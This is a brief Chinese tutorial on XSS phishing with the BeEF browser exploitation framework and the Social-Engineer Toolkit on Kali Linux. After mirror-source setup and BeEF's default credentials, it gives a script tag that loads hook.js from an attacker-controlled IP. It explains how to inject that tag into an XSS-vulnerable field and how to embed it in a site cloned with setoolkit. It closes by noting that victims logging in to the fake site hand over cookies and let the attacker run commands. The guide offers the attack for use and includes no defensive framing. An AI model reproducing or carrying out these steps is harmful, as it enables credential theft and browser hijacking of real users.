完整教程：xss钓鱼目标（beef setoolkit）

基于一款浏览器攻击框架，用Ruby语言开发的，Kali中默认安装的一个模块，用于实现对XSS漏洞的攻击和利用。

源地址访问不通

进入 vi /etc/apt/sources.list
apt-get update 更新一下源

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

第一次进入要求设置账号密码
默认账号密码 beef/beef

在网站有多个框时 十七线是不同的弹窗信息 进而确定哪个框有xss、

确认目标框之后 将beef里的恶意语句插入 要将127 换为主机ip

‘<script src="http://192.168.77.130:3000/hook.js"></script>

setoolkit，是一个为社会工程设计的开源渗透测试框架。SET具有许多自定义攻击向量，可快速进行可信的攻击。

选择1 先输入本机地址 在输入目标网站模板地址

将目标网站与beef结合 打开这个vim ~/.set/web_clone/index.html 加上弹窗代码 注意不要改变源代码结构

连接上beef后 有人登录钓鱼网站就会 查看信息 cookie 和执行命令